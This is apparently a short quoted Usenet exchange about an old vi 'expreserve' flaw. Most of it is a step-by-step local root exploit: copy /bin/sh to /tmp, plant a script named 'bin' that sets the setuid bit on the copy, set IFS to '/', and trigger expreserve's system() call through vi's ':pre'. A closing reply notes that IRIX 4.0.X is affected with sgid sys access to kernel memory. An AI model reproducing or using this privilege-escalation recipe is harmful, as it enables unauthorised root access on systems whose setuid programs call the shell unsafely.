> > ObBug: vi runs expreserve when it crashes or you type ':pre' (on some > versions). Expreserve is setuid root. Expreserve runs /bin/mail > with 'system()'. So, do the following: > % cd /tmp > % cp /bin/sh fubar > % cat > bin > chmod 4755 fubar > ^D > % chmod u+x fubar > % setenv IFS=/ > % vi > :pre > :q > % fubar > # It has been known since 1986? You'll find IRIX 4.0.X vulnerable to it, but expreserve is sgid sys, so you'd get access to read kmem tables -- Regards ----